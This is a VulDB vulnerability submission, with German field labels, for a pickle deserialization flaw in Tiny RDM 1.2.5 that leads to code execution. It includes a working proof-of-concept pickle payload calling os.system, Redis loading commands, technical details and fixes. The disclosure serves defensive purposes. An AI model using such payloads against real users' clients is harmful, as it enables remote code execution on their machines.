| Titel | tiny-rdm Tiny RDM 1.2.5 Insecure Deserialization |
|---|
| Beschreibung | # TinyRDM Pickle Decoder RCE
- **Tiny RDM Version**: v1.2.5
- **OS Version**: Mac/Windows/Linux
- **Redis Version**: latest
TinyRDM ships with a builtin “Pickle” decoder that invokes `pickle.loads` on the TinyRDM host whenever a user explicitly selects Pickle decoding in the value viewer. Because Python pickle is inherently unsafe for untrusted input, an attacker controlling Redis data can achieve arbitrary code execution on the user’s machine simply by getting the user to inspect the malicious key and choose Pickle decoding in TinyRDM.
- **Affected components**
pickle_convert.go creates `pickle_decoder.py` and runs `pickle.loads(decoded)` without isolation. browser_service.go calls `convutil.ConvertTo` for key values when the user requests Pickle decoding.
- **Impact**
Remote code execution with the privileges of the TinyRDM desktop user. Any Redis server that a user connects to can deliver a pickle payload; viewing the key triggers arbitrary command execution on the client machine.
- **Proof of Concept**
1. Generate malicious pickle payload (touches `/tmp/hacked-by-zznq` on the TinyRDM host):
```python3
# poc.py
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ("touch /tmp/hacked-by-zznq",))
with open("payload.pkl", "wb") as f:
f.write(pickle.dumps(RCE()))
```
```bash
python3 poc.py # writes payload.pkl
```
2. Start Redis (example):
```bash
docker run --rm -p 6379:6379 --name tinyrdm-redis redis:latest
docker cp payload.pkl tinyrdm-redis:/tmp/payload.pkl
docker exec tinyrdm-redis sh -c 'redis-cli -x LPUSH evil_poc:list </tmp/payload.pkl'
```
3. In TinyRDM, connect to the Redis instance and open key `evil_poc`. Choose decode values with "Pickle".
4. As soon as the value viewer loads, [PickleConvert::Decode](https://github.com/tiny-craft/tiny-rdm/blob/main/backend/utils/convert/pickle_convert.go#L107) executes on the host and creates `/tmp/hacked-by-zznq`, proving code execution.
<img height="800" alt="Image" src="https://github.com/user-attachments/assets/f44b46e0-d414-438b-baad-1d3032e89682" />
- **Technical Details**
- When the user selects `decode=Pickle`, `convutil.ConvertTo` goes straight to `pickleConv.Decode`, spawning a local Python interpreter and running `pickle.loads`.
- List/Hash/Set/.. viewers call `ConvertTo` when the user changes the Decode dropdown, so payloads embedded in non-string key types can also trigger execution.
- **Recommended Fixes**
1. Require explicit opt-in with a prominent warning, or disable it entirely.
2. If pickle support must remain, run the helper in a sandbox (container, seccomp) and deserialize with a restricted, schema-checked parser rather than `pickle.loads`.
|
|---|
| Quelle | ⚠️ https://github.com/tiny-craft/tiny-rdm/issues/512 |
|---|
| Benutzer | zznQ (UID 64000) |
|---|
| Einreichung | 01.12.2025 16:16 (vor 6 Monaten) |
|---|
| Moderieren | 12.12.2025 20:47 (11 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 336282 [tiny-rdm Tiny RDM bis 1.2.5 Pickle Decoding pickle_convert.go pickle.loads erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|